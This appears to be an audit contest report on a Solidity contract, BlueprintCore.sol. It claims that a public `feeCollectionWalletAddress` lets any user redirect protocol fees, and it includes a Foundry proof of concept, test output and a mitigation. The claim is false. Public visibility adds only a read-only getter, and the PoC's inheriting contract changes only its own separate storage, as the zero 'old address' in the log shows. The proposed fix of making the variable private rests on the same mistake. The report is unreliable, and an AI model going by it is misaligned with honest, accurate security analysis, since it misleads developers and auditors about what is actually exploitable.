Tall Green Corgi

High

# Anyone can change `feeCollectionWalletAddress` and receive the fee

### Summary

in `BlueprintCore.sol : 91` the `feeCollectionWalletAddress` variable is set to public , that can causes any any malicious user can change the `feeCollectionWalletAddress` which can lead to loss of funds for the intended `feeCollectionWalletAddress`

### Root Cause

due to the public visibility of `feeCollectionWalletAddress` in contract `BlueprintCore.sol : 91` 
[link](https://github.com/sherlock-audit/2025-03-crestal-network/blob/27a3c28155702b3a68f29347efedffb048010e33/crestal-omni-contracts/src/BlueprintCore.sol#L91)

### Internal Pre-conditions

none

### External Pre-conditions

none

### Attack Path

1. the malicious user creates a smart contract that inherit the `BlueprintCore.sol`
2. then the malicious user changes the `feeCollectionWalletAddress` to another address

### Impact

Changing the `feeCollectionWalletAddress` will lead to loss of fund for the protocol as the protocol will not be able to receive any fee from the user in form of erc20 

### PoC

```
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.26;
import {BlueprintCore} from "./BlueprintCore.sol";
import {console} from "forge-std/console.sol";
contract canChangeAddress is BlueprintCore {

    function changeFeeCollectionWalletAddress() public returns(address){
        address oldaddress = feeCollectionWalletAddress;
        address _feeCollectionWalletAddress = 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4;
        feeCollectionWalletAddress = _feeCollectionWalletAddress;
        return oldaddress;
       
    }
    function getFeeCollectionWalletAddress() public view returns(address){
        return feeCollectionWalletAddress;   
  
    }

}
```
```// SPDX-License-Identifier: MIT

pragma solidity ^0.8.26;
import {Test, console} from "forge-std/Test.sol";
import {canChangeAddress} from "../src/canChangeAddress.sol";
import {BlueprintCore} from "../src/BlueprintCore.sol";

contract changingAddress is Test{
    BlueprintCore bulePrint;
    canChangeAddress canChangcontract;
    address attacker = makeAddr("attacker");
    function setUp() public{
        bulePrint = new BlueprintCore();
        canChangcontract = new canChangeAddress();
    }
    
    function testchangeFeeCollectionWalletAddress() public{
        vm.startPrank(attacker);
        address oldAddr = canChangcontract.changeFeeCollectionWalletAddress();
        console.log("old address");
        console.logAddress(oldAddr);
        console.log("new address");
        console.logAddress(canChangcontract.getFeeCollectionWalletAddress());
        vm.stopPrank();
    }
}
```
```console
Ran 1 test for test/changingAddress.t.sol:changingAddress
[PASS] testchangeFeeCollectionWalletAddress() (gas: 40357)
Logs:
old address
0x0000000000000000000000000000000000000000 
new address
0x5B38Da6a701c568545dCfcB03FcB875f56beddC4
```

### Mitigation

change the visibility of `feeCollectionWalletAddress` from public to private